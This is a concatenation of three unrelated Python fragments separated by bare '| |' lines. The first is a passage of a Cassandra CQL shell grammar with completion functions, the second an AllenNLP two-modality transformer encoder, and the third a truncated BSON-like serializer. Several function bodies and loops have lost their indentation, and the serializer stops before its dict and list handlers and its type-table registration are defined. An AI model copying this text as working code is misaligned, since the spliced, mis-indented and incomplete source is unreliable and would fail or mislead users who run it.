<op> ::= /[-+=,().]/ ;
<cmp> ::= /[<>]=?/ ;
<unclosedString> ::= /'([^']|'')*/ ;
<unclosedComment> ::= /[/][*][^\n]*$/ ;
<symbol> ::= <star>
| <range>
| <op>
| <cmp>
;
<name> ::= <identifier>
| <stringLiteral>
| <integer>
;
<term> ::= <stringLiteral>
| <integer>
| <float>
| <uuid>
;
<colname> ::= <term>
| <identifier>
| nocomplete=<K_KEY>
;
<statementBody> ::= <useStatement>
| <selectStatement>
| <dataChangeStatement>
| <schemaChangeStatement>
;
<dataChangeStatement> ::= <insertStatement>
| <updateStatement>
| <deleteStatement>
| <truncateStatement>
| <batchStatement>
;
<schemaChangeStatement> ::= <createKeyspaceStatement>
| <createColumnFamilyStatement>
| <createIndexStatement>
| <dropKeyspaceStatement>
| <dropColumnFamilyStatement>
| <dropIndexStatement>
| <alterTableStatement>
;
<consistencylevel> ::= cl=<identifier> ;
<storageType> ::= typename=( <identifier> | <stringLiteral> ) ;
<keyspaceName> ::= ksname=<name> ;
<columnFamilyName> ::= ( ksname=<name> "." )? cfname=<name> ;
'''
@completer_for('colname', 'nocomplete')
def nocomplete(ctxt, cass):
    # deliberately offer no completions (e.g. for the KEY pseudo-column)
    return ()
@completer_for('consistencylevel', 'cl')
def cl_completer(ctxt, cass):
    # any defined consistency level is acceptable here
    return CqlRuleSet.consistency_levels
@completer_for('storageType', 'typename')
def storagetype_completer(ctxt, cass):
    # complete with the known CQL storage type names
    return cqltypes.cql_types
@completer_for('keyspaceName', 'ksname')
def ks_name_completer(ctxt, cass):
    """Complete with every keyspace name, quoted where necessary."""
    return [maybe_escape_name(ksname) for ksname in cass.get_keyspace_names()]
@completer_for('columnFamilyName', 'ksname')
def cf_ks_name_completer(ctxt, cass):
    """Complete the optional 'keyspace.' prefix of a column family name."""
    names = cass.get_keyspace_names()
    return [maybe_escape_name(name) + '.' for name in names]
@completer_for('columnFamilyName', 'cfname')
def cf_name_completer(ctxt, cass):
    """Complete with the column family names of the bound keyspace
    (or of the current keyspace when none is bound)."""
    keyspace = ctxt.get_binding('ksname', None)
    if keyspace is not None:
        keyspace = dequote_name(keyspace)
    try:
        names = cass.get_columnfamily_names(keyspace)
    except Exception:
        # with no explicit keyspace there may simply be no current one;
        # otherwise the error is real and should propagate
        if keyspace is None:
            return ()
        raise
    return [maybe_escape_name(name) for name in names]
def get_cfdef(ctxt, cass):
    """Look up the CfDef for the column family currently bound in ctxt."""
    cfname = ctxt.get_binding('cfname')
    ksname = ctxt.get_binding('ksname', None)
    return cass.get_columnfamily(cfname, ksname=ksname)
syntax_rules += r'''
<useStatement> ::= "USE" ksname=<keyspaceName>
;
<selectStatement> ::= "SELECT" <whatToSelect>
"FROM" cf=<columnFamilyName>
("USING" "CONSISTENCY" selcl=<consistencylevel>)?
("WHERE" <selectWhereClause>)?
("LIMIT" limit=<integer>)?
;
<selectWhereClause> ::= <relation> ("AND" <relation>)*
| keyname=<colname> "IN" "(" <term> ("," <term>)* ")"
;
<relation> ::= [rel_lhs]=<colname> ("=" | "<" | ">" | "<=" | ">=") <colname>
;
<whatToSelect> ::= colname=<colname> ("," colname=<colname>)*
| ("FIRST" <integer>)? "REVERSED"? (rangestart=<colname> ".." rangeend=<colname>
| "*")
| "COUNT" countparens="(" "*" ")"
;
'''
@completer_for('selectStatement', 'selcl')
def select_statement_consistencylevel(ctxt, cass):
    """All consistency levels except ANY are valid for reads."""
    levels = []
    for level in CqlRuleSet.consistency_levels:
        if level != 'ANY':
            levels.append(level)
    return levels
@completer_for('selectWhereClause', 'keyname')
def select_where_keyname_completer(ctxt, cass):
    """Complete the row-key column: its alias when defined, else KEY."""
    cfdef = get_cfdef(ctxt, cass)
    if cfdef.key_alias is not None:
        return [cfdef.key_alias]
    return ['KEY']
@completer_for('relation', 'rel_lhs')
def select_relation_lhs_completer(ctxt, cass):
    """Only filterable (key/indexed) columns may appear on a WHERE lhs."""
    cfdef = get_cfdef(ctxt, cass)
    names = cass.filterable_column_names(cfdef)
    return [maybe_escape_name(name) for name in names]
@completer_for('whatToSelect', 'countparens')
def select_count_parens_completer(ctxt, cass):
    # COUNT only supports the (*) form here
    return ['(*)']
explain_completion('whatToSelect', 'colname')
explain_completion('whatToSelect', 'rangestart', '<range_start>')
explain_completion('whatToSelect', 'rangeend', '<range_end>')
syntax_rules += r'''
<insertStatement> ::= "INSERT" "INTO" cf=<columnFamilyName>
"(" keyname=<colname> ","
[colname]=<colname> ( "," [colname]=<colname> )* ")"
"VALUES" "(" <term> "," <term> ( "," <term> )* ")"
( "USING" [insertopt]=<usingOption>
( "AND" [insertopt]=<usingOption> )* )?
;
<usingOption> ::= "CONSISTENCY" <consistencylevel>
| "TIMESTAMP" <integer>
| "TTL" <integer>
;
'''
@completer_for('insertStatement', 'keyname')
def insert_keyname_completer(ctxt, cass):
    """Complete the key column name: its alias when defined, else KEY."""
    cfdef = get_cfdef(ctxt, cass)
    if cfdef.key_alias is not None:
        return [cfdef.key_alias]
    return ['KEY']
# column names in INSERT can't be usefully enumerated; just show a hint
explain_completion('insertStatement', 'colname')
@completer_for('insertStatement', 'insertopt')
def insert_option_completer(ctxt, cass):
    """Offer only the USING options not already present in this INSERT."""
    remaining = set(['CONSISTENCY', 'TIMESTAMP', 'TTL'])
    for used in ctxt.get_binding('insertopt', ()):
        remaining.discard(used.split()[0])
    return remaining
syntax_rules += r'''
<updateStatement> ::= "UPDATE" cf=<columnFamilyName>
( "USING" [updateopt]=<usingOption>
( "AND" [updateopt]=<usingOption> )* )?
"SET" <assignment> ( "," <assignment> )*
"WHERE" <updateWhereClause>
;
<assignment> ::= updatecol=<colname> "=" update_rhs=<colname>
( counterop=( "+" | "-"? ) <integer> )?
;
<updateWhereClause> ::= updatefiltercol=<colname> "=" <term>
| updatefilterkey=<colname> filter_in="IN" "(" <term> ( "," <term> )* ")"
;
'''
@completer_for('updateStatement', 'updateopt')
def update_option_completer(ctxt, cass):
    """Offer only the USING options not already present in this UPDATE.

    Renamed from insert_option_completer: the previous definition reused
    that name and silently shadowed the INSERT completer at module level.
    Both remained registered (registration happens at def time via the
    decorator), so behavior is unchanged -- this only removes the
    confusing name collision.
    """
    opts = set('CONSISTENCY TIMESTAMP TTL'.split())
    for opt in ctxt.get_binding('updateopt', ()):
        opts.discard(opt.split()[0])
    return opts
@completer_for('assignment', 'updatecol')
def update_col_completer(ctxt, cass):
    """Complete the SET lhs with known column names plus a generic hint."""
    cfdef = get_cfdef(ctxt, cass)
    candidates = [maybe_escape_name(cm.name) for cm in cfdef.column_metadata]
    candidates.append(Hint('<colname>'))
    return candidates
@completer_for('assignment', 'update_rhs')
def update_countername_completer(ctxt, cass):
    """For a counter column the rhs must name the column itself;
    otherwise any term is acceptable."""
    cfdef = get_cfdef(ctxt, cass)
    curcol = dequote_name(ctxt.get_binding('updatecol', ''))
    if CqlRuleSet.is_counter_col(cfdef, curcol):
        return [maybe_escape_name(curcol)]
    return [Hint('<term>')]
@completer_for('assignment', 'counterop')
def update_counterop_completer(ctxt, cass):
    """Only counter columns admit the +/- increment syntax."""
    cfdef = get_cfdef(ctxt, cass)
    curcol = dequote_name(ctxt.get_binding('updatecol', ''))
    if not CqlRuleSet.is_counter_col(cfdef, curcol):
        return []
    return ['+', '-']
@completer_for('updateWhereClause', 'updatefiltercol')
def update_filtercol_completer(ctxt, cass):
    """Only filterable (key/indexed) columns may be filtered on."""
    cfdef = get_cfdef(ctxt, cass)
    names = cass.filterable_column_names(cfdef)
    return [maybe_escape_name(name) for name in names]
@completer_for('updateWhereClause', 'updatefilterkey')
def update_filterkey_completer(ctxt, cass):
cfdef = get_cfdef(ctxt, cass)
return [cfdef.key_alias if cfdef.key_alias is not None else 'KEY']
@completer_for('updateWhereClause', 'filter_in')
def update_filter_in_completer(ctxt, cass):
cfdef = get_cfdef(ctxt, cass)
fk = ctxt.get_binding('updatefilterkey')
return ['IN'] if fk in ('KEY', cfdef.key_alias) else []
# Grammar and completers for DELETE (column list optional = whole-row delete).
syntax_rules += r'''
<deleteStatement> ::= "DELETE" ( [delcol]=<colname> ( "," [delcol]=<colname> )* )?
                        "FROM" cf=<columnFamilyName>
                        ( "USING" [delopt]=<deleteOption> ( "AND" [delopt]=<deleteOption> )* )?
                        "WHERE" <updateWhereClause>
                    ;
<deleteOption> ::= "CONSISTENCY" <consistencylevel>
                 | "TIMESTAMP" <integer>
                 ;
'''
@completer_for('deleteStatement', 'delopt')
def delete_opt_completer(ctxt, cass):
    # DELETE USING takes CONSISTENCY/TIMESTAMP (no TTL), each at most once.
    opts = set('CONSISTENCY TIMESTAMP'.split())
    for opt in ctxt.get_binding('delopt', ()):
        opts.discard(opt.split()[0])
    return opts
explain_completion('deleteStatement', 'delcol', '<column_to_delete>')
# Grammar and completer for BEGIN BATCH ... APPLY BATCH.
syntax_rules += r'''
<batchStatement> ::= "BEGIN" "BATCH"
                        ( "USING" [batchopt]=<usingOption>
                                  ( "AND" [batchopt]=<usingOption> )* )?
                        [batchstmt]=<batchStatementMember> ";"
                            ( [batchstmt]=<batchStatementMember> ";" )*
                     "APPLY" "BATCH"
                   ;
<batchStatementMember> ::= <insertStatement>
                         | <updateStatement>
                         | <deleteStatement>
                         ;
'''
@completer_for('batchStatement', 'batchopt')
def batch_opt_completer(ctxt, cass):
    # Batch-level USING accepts CONSISTENCY/TIMESTAMP only, each at most once.
    opts = set('CONSISTENCY TIMESTAMP'.split())
    for opt in ctxt.get_binding('batchopt', ()):
        opts.discard(opt.split()[0])
    return opts
syntax_rules += r'''
<truncateStatement> ::= "TRUNCATE" cf=<columnFamilyName>
;
'''
syntax_rules += r'''
<createKeyspaceStatement> ::= "CREATE" "KEYSPACE" ksname=<name>
"WITH" [optname]=<optionName> "=" [optval]=<optionVal>
( "AND" [optname]=<optionName> "=" [optval]=<optionVal> )*
;
<optionName> ::= <identifier> ( ":" ( <identifier> | <integer> ) )?
;
<optionVal> ::= <stringLiteral>
| <identifier>
| <integer>
;
'''
explain_completion('createKeyspaceStatement', 'ksname', '<new_keyspace_name>')
@completer_for('createKeyspaceStatement', 'optname')
def create_ks_opt_completer(ctxt, cass):
    # Until strategy_class is given it is the only sensible option; after
    # that, suggest replication_factor for strategies that take one.
    exist_opts = ctxt.get_binding('optname', ())
    try:
        stratopt = exist_opts.index('strategy_class')
    except ValueError:
        return ['strategy_class =']
    vals = ctxt.get_binding('optval')
    stratclass = dequote_value(vals[stratopt])
    if stratclass in CqlRuleSet.replication_factor_strategies:
        return ['strategy_options:replication_factor =']
    return [Hint('<strategy_option_name>')]
@completer_for('createKeyspaceStatement', 'optval')
def create_ks_optval_completer(ctxt, cass):
    # Directly after 'strategy_class =', offer the known strategy classes.
    exist_opts = ctxt.get_binding('optname', (None,))
    if exist_opts[-1] == 'strategy_class':
        return map(escape_value, CqlRuleSet.replication_strategies)
    return [Hint('<option_value>')]
syntax_rules += r'''
<createColumnFamilyStatement> ::= "CREATE" ( "COLUMNFAMILY" | "TABLE" ) cf=<name>
"(" keyalias=<colname> <storageType> "PRIMARY" "KEY"
( "," colname=<colname> <storageType> )* ")"
( "WITH" [cfopt]=<cfOptionName> "=" [optval]=<cfOptionVal>
( "AND" [cfopt]=<cfOptionName> "=" [optval]=<cfOptionVal> )* )?
;
<cfOptionName> ::= cfoptname=<identifier> ( cfoptsep=":" cfsubopt=( <identifier> | <integer> ) )?
;
<cfOptionVal> ::= <identifier>
| <stringLiteral>
| <integer>
| <float>
;
'''
explain_completion('createColumnFamilyStatement', 'keyalias', '<new_key_name>')
explain_completion('createColumnFamilyStatement', 'cf', '<new_table_name>')
explain_completion('createColumnFamilyStatement', 'colname', '<new_column_name>')
@completer_for('cfOptionName', 'cfoptname')
def create_cf_option_completer(ctxt, cass):
    # Offer plain CF options plus map-style options (which take a ':' subkey).
    return [c[0] for c in CqlRuleSet.columnfamily_options] + \
           [c[0] + ':' for c in CqlRuleSet.columnfamily_map_options]
@completer_for('cfOptionName', 'cfoptsep')
def create_cf_suboption_separator(ctxt, cass):
    # Only map-style options accept the ':' separator and a suboption.
    opt = ctxt.get_binding('cfoptname')
    if any(opt == c[0] for c in CqlRuleSet.columnfamily_map_options):
        return [':']
    return ()
@completer_for('cfOptionName', 'cfsubopt')
def create_cf_suboption_completer(ctxt, cass):
    opt = ctxt.get_binding('cfoptname')
    if opt == 'compaction_strategy_options':
        # try to determine the strategy class in use
        prevopts = ctxt.get_binding('cfopt', ())
        prevvals = ctxt.get_binding('optval', ())
        for prevopt, prevval in zip(prevopts, prevvals):
            if prevopt == 'compaction_strategy_class':
                csc = dequote_value(prevval)
                break
        else:
            # Strategy not given in this statement; fall back to the CF's
            # currently configured strategy (empty string on any failure).
            cf = ctxt.get_binding('cf')
            try:
                csc = cass.get_columnfamily(cf).compaction_strategy
            except Exception:
                csc = ''
        # Keep only the class name from the fully qualified path.
        csc = csc.split('.')[-1]
        if csc == 'SizeTieredCompactionStrategy':
            return ['min_sstable_size']
        elif csc == 'LeveledCompactionStrategy':
            return ['sstable_size_in_mb']
    for optname, _, subopts in CqlRuleSet.columnfamily_map_options:
        if opt == optname:
            return subopts
    return ()
def create_cf_option_val_completer(ctxt, cass):
    # Suggest values appropriate to the most recently typed CF option.
    exist_opts = ctxt.get_binding('cfopt')
    this_opt = exist_opts[-1]
    if this_opt == 'compression_parameters:sstable_compression':
        return map(escape_value, CqlRuleSet.available_compression_classes)
    if this_opt == 'compaction_strategy_class':
        return map(escape_value, CqlRuleSet.available_compaction_classes)
    if any(this_opt == opt[0] for opt in CqlRuleSet.obsolete_cf_options):
        return ["'<obsolete_option>'"]
    if this_opt in ('comparator', 'default_validation'):
        return cqltypes.cql_types
    if this_opt == 'read_repair_chance':
        return [Hint('<float_between_0_and_1>')]
    if this_opt in ('replicate_on_write', 'populate_io_cache_on_flush'):
        return [Hint('<yes_or_no>')]
    if this_opt in ('min_compaction_threshold', 'max_compaction_threshold', 'gc_grace_seconds'):
        return [Hint('<integer>')]
    return [Hint('<option_value>')]
# Registered manually (not via decorator) so the same completer can be
# reused by the ALTER TABLE rules below.
completer_for('createColumnFamilyStatement', 'optval') \
    (create_cf_option_val_completer)
# Grammar and completers for CREATE INDEX.
syntax_rules += r'''
<createIndexStatement> ::= "CREATE" "INDEX" indexname=<identifier>? "ON"
                               cf=<name> "(" col=<colname> ")"
                         ;
'''
explain_completion('createIndexStatement', 'indexname', '<new_index_name>')
@completer_for('createIndexStatement', 'cf')
def create_index_cf_completer(ctxt, cass):
    return map(maybe_escape_name, cass.get_columnfamily_names())
@completer_for('createIndexStatement', 'col')
def create_index_col_completer(ctxt, cass):
    # Only columns without an existing index are candidates.
    cfdef = cass.get_columnfamily(dequote_name(ctxt.get_binding('cf')))
    colnames = [md.name for md in cfdef.column_metadata if md.index_name is None]
    return map(maybe_escape_name, colnames)
# Grammar and completers for the DROP statements.
syntax_rules += r'''
<dropKeyspaceStatement> ::= "DROP" "KEYSPACE" ksname=<keyspaceName>
                          ;
'''
@completer_for('dropKeyspaceStatement', 'ksname')
def drop_ks_completer(ctxt, cass):
    return map(maybe_escape_name, cass.get_keyspace_names())
syntax_rules += r'''
<dropColumnFamilyStatement> ::= "DROP" ( "COLUMNFAMILY" | "TABLE" ) cf=<name>
                              ;
'''
@completer_for('dropColumnFamilyStatement', 'cf')
def drop_cf_completer(ctxt, cass):
    return map(maybe_escape_name, cass.get_columnfamily_names())
syntax_rules += r'''
<dropIndexStatement> ::= "DROP" "INDEX" indexname=<name>
                       ;
'''
@completer_for('dropIndexStatement', 'indexname')
def drop_index_completer(ctxt, cass):
    return map(maybe_escape_name, cass.get_index_names())
# Grammar and completers for ALTER COLUMNFAMILY/TABLE.
syntax_rules += r'''
<alterTableStatement> ::= "ALTER" ( "COLUMNFAMILY" | "TABLE" ) cf=<name> <alterInstructions>
                        ;
<alterInstructions> ::= "ALTER" existcol=<name> "TYPE" <storageType>
                      | "ADD" newcol=<name> <storageType>
                      | "DROP" existcol=<name>
                      | "WITH" [cfopt]=<cfOptionName> "=" [optval]=<cfOptionVal>
                        ( "AND" [cfopt]=<cfOptionName> "=" [optval]=<cfOptionVal> )*
                      ;
'''
@completer_for('alterTableStatement', 'cf')
def alter_table_cf_completer(ctxt, cass):
    return map(maybe_escape_name, cass.get_columnfamily_names())
@completer_for('alterInstructions', 'existcol')
def alter_table_col_completer(ctxt, cass):
    # Existing columns, including the key alias, are valid targets.
    cfdef = cass.get_columnfamily(dequote_name(ctxt.get_binding('cf')))
    cols = [md.name for md in cfdef.column_metadata]
    if cfdef.key_alias is not None:
        cols.append(cfdef.key_alias)
    return map(maybe_escape_name, cols)
explain_completion('alterInstructions', 'newcol', '<new_column_name>')
# ALTER ... WITH reuses the CREATE COLUMNFAMILY option-value completer.
completer_for('alterInstructions', 'optval') \
    (create_cf_option_val_completer)
# END SYNTAX/COMPLETION RULE DEFINITIONS
CqlRuleSet.append_rules(syntax_rules)
| |
from typing import Optional, List, TYPE_CHECKING
import torch
from allennlp.common import FromParams
from allennlp.modules.util import replicate_layers
from allennlp.modules.transformer.transformer_layer import TransformerLayer
from allennlp.modules.transformer.bimodal_connection_layer import BiModalConnectionLayer
from allennlp.modules.transformer.transformer_module import TransformerModule
if TYPE_CHECKING:
from transformers.configuration_utils import PretrainedConfig
class BiModalEncoder(TransformerModule, FromParams):
    """
    This module encodes two modalities separately, and performs bi-directional
    attention using a connection layer. It is based on the modified BertEncoder in
    the paper: [ViLBERT: Pretraining Task-Agnostic Visiolinguistic Representations
    for Vision-and-Language Tasks](https://api.semanticscholar.org/CorpusID:199453025)
    # Parameters
    num_hidden_layers1: `int` (default = `12`)
        Number of hidden layers in the transformer block for the first modality.
    num_hidden_layers2: `int` (default = `12`)
        Number of hidden layers in the transformer block for the second modality.
    hidden_size1: `int` (default = `1024`)
    hidden_size2: `int` (default = `1024`)
    combined_hidden_size: `int` (default = `1024`)
        Hidden size for the connection layer.
    intermediate_size1: `int` (default = `1024`)
    intermediate_size2: `int` (default = `1024`)
    num_attention_heads1: `int` (default = `8`)
    num_attention_heads2: `int` (default = `8`)
    combined_num_attention_heads: `int` (default = `8`)
        Number of attention heads in the connection layer.
    attention_dropout1: `float` (default = `0.1`)
    hidden_dropout1: `float` (default = `0.1`)
    attention_dropout2: `float` (default = `0.1`)
    hidden_dropout2: `float` (default = `0.1`)
    biattention_id1: `List`, optional (default = `[1]`)
    biattention_id2: `List`, optional (default = `[1]`)
    fixed_layer1: `int` (default = `0`)
    fixed_layer2: `int` (default = `0`)
    fast_mode: `bool` (default = `False`)
    with_coattention: `bool` (default = `True`)
    in_batch_pairs: `bool` (default = `False`)
    """
    # When loading pretrained weights, the checkpoint's "layer" parameters
    # populate the first modality's stack ("layers1").
    _pretrained_mapping = {"layer": "layers1"}
    _pretrained_relevant_module = ["encoder", "bert.encoder"]
    # The second modality's stack and the connection layers have no
    # pretrained counterpart, so they may be missing from a checkpoint.
    _pretrained_allow_missing = [r"^layers2\..*", r"^c_layer\..*"]
    def __init__(
        self,
        num_hidden_layers1: int = 12,
        num_hidden_layers2: int = 12,
        hidden_size1: int = 1024,
        hidden_size2: int = 1024,
        combined_hidden_size: int = 1024,
        intermediate_size1: int = 1024,
        intermediate_size2: int = 1024,
        num_attention_heads1: int = 8,
        num_attention_heads2: int = 8,
        combined_num_attention_heads: int = 8,
        attention_dropout1: float = 0.1,
        hidden_dropout1: float = 0.1,
        attention_dropout2: float = 0.1,
        hidden_dropout2: float = 0.1,
        activation: str = "relu",
        biattention_id1: Optional[List[int]] = None,
        biattention_id2: Optional[List[int]] = None,
        fixed_layer1: int = 0,
        fixed_layer2: int = 0,
        fast_mode: bool = False,
        with_coattention: bool = True,
        in_batch_pairs: bool = False,
    ):
        super().__init__()
        self.FAST_MODE = fast_mode
        self.with_coattention = with_coattention
        # Layer indices at which co-attention is applied (mutable-default
        # avoidance: None stands in for [1]).
        self.biattention_id1 = biattention_id1 or [1]
        self.biattention_id2 = biattention_id2 or [1]
        self.in_batch_pairs = in_batch_pairs
        self.fixed_layer1 = fixed_layer1
        self.fixed_layer2 = fixed_layer2
        self.combined_size = combined_hidden_size
        self.hidden_size1 = hidden_size1
        self.hidden_size2 = hidden_size2
        # Template layers for each modality; replicated per depth below.
        layer1 = TransformerLayer(
            hidden_size=hidden_size1,
            intermediate_size=intermediate_size1,
            num_attention_heads=num_attention_heads1,
            attention_dropout=attention_dropout1,
            hidden_dropout=hidden_dropout1,
            activation=activation,
        )
        layer2 = TransformerLayer(
            hidden_size=hidden_size2,
            intermediate_size=intermediate_size2,
            num_attention_heads=num_attention_heads2,
            attention_dropout=attention_dropout2,
            hidden_dropout=hidden_dropout2,
            activation=activation,
        )
        connect_layer = BiModalConnectionLayer(
            hidden_size1=hidden_size1,
            hidden_size2=hidden_size2,
            combined_hidden_size=combined_hidden_size,
            intermediate_size1=intermediate_size1,
            intermediate_size2=intermediate_size2,
            num_attention_heads=combined_num_attention_heads,
            dropout1=hidden_dropout1,
            dropout2=hidden_dropout2,
            activation=activation,
        )
        self.layers1 = replicate_layers(layer1, num_hidden_layers1)
        self.layers2 = replicate_layers(layer2, num_hidden_layers2)
        # One connection layer per co-attention point.
        self.c_layer = replicate_layers(connect_layer, len(self.biattention_id2))
    def forward(
        self,
        embedding1,
        embedding2,
        attention_mask1,
        attention_mask2,
        co_attention_mask=None,
        output_all_encoded_layers=True,
    ):
        # Run each modality's stack in segments: up to the next co-attention
        # point, apply the connection layer, then continue.  start*/end* track
        # how far each stack has been consumed.
        start1 = 0
        start2 = 0
        count = 0
        all_encoder_layers1 = []
        all_encoder_layers2 = []
        batch_size, num_words, hidden_size1 = embedding1.size()
        _, num_regions, hidden_size2 = embedding2.size()
        for layer_id2, layer_id1 in zip(self.biattention_id2, self.biattention_id1):
            end1 = layer_id1
            end2 = layer_id2
            assert self.fixed_layer1 <= end1
            assert self.fixed_layer2 <= end2
            # Layers below fixed_layer1 run without gradient (frozen).
            for idx in range(start1, self.fixed_layer1):
                with torch.no_grad():
                    embedding1 = self.layers1[idx](embedding1, attention_mask1).hidden_states
                start1 = self.fixed_layer1
            for idx in range(start1, end1):
                embedding1 = self.layers1[idx](embedding1, attention_mask1).hidden_states
            # Same frozen/trainable split for the second modality.
            for idx in range(start2, self.fixed_layer2):
                with torch.no_grad():
                    embedding2 = self.layers2[idx](embedding2, attention_mask2).hidden_states
                start2 = self.fixed_layer2
            for idx in range(start2, end2):
                embedding2 = self.layers2[idx](embedding2, attention_mask2).hidden_states
            if count == 0 and self.in_batch_pairs:
                # new batch size is the batch_size ^2
                embedding2 = (
                    embedding2.unsqueeze(0)
                    .expand(batch_size, batch_size, num_regions, hidden_size2)
                    .contiguous()
                    .view(batch_size * batch_size, num_regions, hidden_size2)
                )
                attention_mask2 = (
                    attention_mask2.unsqueeze(0)
                    .expand(batch_size, batch_size, 1, 1, num_regions)
                    .contiguous()
                    .view(batch_size * batch_size, 1, 1, num_regions)
                )
                embedding1 = (
                    embedding1.unsqueeze(1)
                    .expand(batch_size, batch_size, num_words, hidden_size1)
                    .contiguous()
                    .view(batch_size * batch_size, num_words, hidden_size1)
                )
                attention_mask1 = (
                    attention_mask1.unsqueeze(1)
                    .expand(batch_size, batch_size, 1, 1, num_words)
                    .contiguous()
                    .view(batch_size * batch_size, 1, 1, num_words)
                )
                if co_attention_mask is not None:
                    co_attention_mask = (
                        co_attention_mask.unsqueeze(1)
                        .expand(batch_size, batch_size, 1, num_regions, num_words)
                        .contiguous()
                        .view(batch_size * batch_size, 1, num_regions, num_words)
                    )
            if count == 0 and self.FAST_MODE:
                # Broadcast the first modality's batch to match the second's.
                embedding1 = embedding1.expand(
                    embedding2.size(0),
                    embedding1.size(1),
                    embedding1.size(2),
                )
                attention_mask1 = attention_mask1.expand(
                    embedding2.size(0),
                    attention_mask1.size(1),
                    attention_mask1.size(2),
                    attention_mask1.size(3),
                )
            if self.with_coattention:
                # Bi-directional cross-modal attention at this point.
                embedding1, embedding2 = self.c_layer[count](
                    embedding1,
                    attention_mask1,
                    embedding2,
                    attention_mask2,
                    co_attention_mask,
                )
            start2 = end2
            start1 = end1
            count += 1
            if output_all_encoded_layers:
                all_encoder_layers1.append(embedding1)
                all_encoder_layers2.append(embedding2)
        # Run any layers remaining after the last co-attention point.
        for idx in range(start2, len(self.layers2)):
            embedding2 = self.layers2[idx](embedding2, attention_mask2).hidden_states
        for idx in range(start1, len(self.layers1)):
            embedding1 = self.layers1[idx](embedding1, attention_mask1).hidden_states
        # add the end part to finish.
        if not output_all_encoded_layers:
            all_encoder_layers1.append(embedding1)
            all_encoder_layers2.append(embedding2)
        return (
            torch.stack(all_encoder_layers1, dim=-1),
            torch.stack(all_encoder_layers2, dim=-1),
        )
    @classmethod
    def _from_config(cls, config: "PretrainedConfig", **kwargs):
        # The huggingface config describes only the first modality's stack;
        # everything else keeps its constructor default unless overridden.
        final_kwargs = {}
        final_kwargs["num_hidden_layers1"] = config.num_hidden_layers
        final_kwargs["hidden_size1"] = config.hidden_size
        final_kwargs["num_attention_heads1"] = config.num_attention_heads
        final_kwargs["attention_dropout1"] = config.attention_probs_dropout_prob
        final_kwargs["hidden_dropout1"] = config.hidden_dropout_prob
        final_kwargs["intermediate_size1"] = config.intermediate_size
        final_kwargs["activation"] = config.hidden_act
        final_kwargs.update(**kwargs)
        return cls(**final_kwargs)
| |
"""Similar to, but incompatible with BSON"""
import struct
import cStringIO
import calendar
import pytz
from datetime import datetime
__all__ = ['dumps', 'dump', 'loads', 'load']
def dumps(value):
    """Serialize *value* and return the encoded byte string."""
    sink = cStringIO.StringIO()
    encode(value, sink)
    return sink.getvalue()
def dump(value, stream):
    """Serialize *value* directly onto *stream*."""
    encode(value, stream)
def loads(bytes):
    """Deserialize a single value from a byte string."""
    return load(cStringIO.StringIO(bytes))
def load(stream):
    """Deserialize a single value from a file-like object."""
    return decode(stream)
_type_by_magic = {
'\x01': "dict",
'\x02': "list",
'\x03': "double",
'\x04': "unicode",
'\x05': "binary",
'\x06': "bool",
'\x07': "datetime",
'\x08': "int32",
'\x09': "int64",
'\x10': "none"
}
_magic_by_type = {}
for k,v in _type_by_magic.items():
_magic_by_type[v] = k
_encode_by_type = {}
_decode_by_type = {}
def encode(value, stream):
    """Write *value* to *stream* as magic byte + big-endian length + payload.

    Containers (dict/list/tuple) are delegated to their own encoders, which
    use a terminator byte instead of a length prefix.
    """
    # Map the python type to a wire type name.  Order matters: bool is an
    # int subclass, so it is tested before int.
    type_name = None
    if isinstance(value, float):
        type_name = 'double'
    elif isinstance(value, unicode):
        type_name = 'unicode'
    elif isinstance(value, str):
        type_name = 'binary'
    elif isinstance(value, bool):
        type_name = 'bool'
    elif isinstance(value, datetime):
        type_name = 'datetime'
    elif isinstance(value, int):
        # ints outside the signed 32-bit range are promoted to int64.
        type_name = 'int64' if (value < -0x80000000 or value > 0x7fffffff) else 'int32'
    elif isinstance(value, long):
        type_name = 'int64'
    elif value is None:
        type_name = 'none'
    if type_name is not None:
        payload = _encode_by_type[type_name](value)
        stream.write(_magic_by_type[type_name])
        stream.write(struct.pack('>I', len(payload)))
        stream.write(payload)
    elif isinstance(value, dict):
        encode_dict(value, stream)
    elif isinstance(value, (list, tuple)):
        encode_list(value, stream)
    else:
        raise ValueError("I have no idea how to encode '%s'" % str(value))
# Internal control-flow exception: raised at end-of-stream or on a container
# terminator byte, so decode_dict/decode_list know when to stop.
class StopDecoding(Exception):
    pass
def decode(stream):
    """Read and return one value from *stream*.

    Raises StopDecoding when a terminator byte or end-of-stream is hit.
    """
    type_name = read_type(stream)
    if type_name == 'dict':
        return decode_dict(stream)
    if type_name == 'list':
        return decode_list(stream)
    return _decode_by_type[type_name](read_chunk(stream))
def read_type(stream):
    """Read the one-byte magic and return its type name.

    Raises StopDecoding at end-of-stream or on the \\x00 terminator, and
    ValueError on an unknown magic byte.
    """
    magic = stream.read(1)
    if not magic or magic == '\x00':
        raise StopDecoding
    try:
        return _type_by_magic[magic]
    except KeyError:
        raise ValueError("Unable to decode, unknown magic number %s"
                         % str(magic).encode('string-escape'))
def read_chunk(stream):
    """Read one length-prefixed payload: a big-endian uint32, then that many bytes."""
    header = stream.read(struct.calcsize('>I'))
    if not header:
        raise StopDecoding
    (length,) = struct.unpack('>I', header)
    if length == 0:
        return ''
    payload = stream.read(length)
    if not payload:
        raise StopDecoding
    if len(payload) < length:
        raise ValueError("Unexpected end of stream")
    return payload
def encode_double(value):
    """Floats travel as big-endian IEEE-754 doubles."""
    return struct.pack('>d', value)
def decode_double(bytes):
    (value,) = struct.unpack('>d', bytes)
    return value
def encode_unicode(value):
    """Text is stored UTF-8 encoded."""
    return value.encode('utf8')
def decode_unicode(bytes):
    return bytes.decode('utf-8')
def encode_binary(value):
    """Byte strings pass through untouched."""
    return value
def decode_binary(bytes):
    return bytes
def encode_bool(value):
    """Booleans are a single signed byte: 1 or 0."""
    return struct.pack('>b', int(bool(value)))
def decode_bool(bytes):
    (flag,) = struct.unpack('>b', bytes)
    return bool(flag)
def encode_datetime(value):
    """Datetimes are milliseconds since the epoch (UTC), as a double."""
    ms = calendar.timegm(value.utctimetuple()) * 1000 + value.microsecond / 1000.0
    return struct.pack('>d', ms)
def decode_datetime(bytes):
    (ms,) = struct.unpack('>d', bytes)
    return datetime.fromtimestamp(ms / 1000.0, pytz.utc)
def encode_none(value):
    """None carries no payload at all."""
    return ''
def decode_none(bytes):
    return None
def encode_int32(value):
    return struct.pack('>i', value)
def decode_int32(bytes):
    (value,) = struct.unpack('>i', bytes)
    return value
def encode_int64(value):
    return struct.pack('>q', value)
def decode_int64(bytes):
    (value,) = struct.unpack('>q', bytes)
    return value
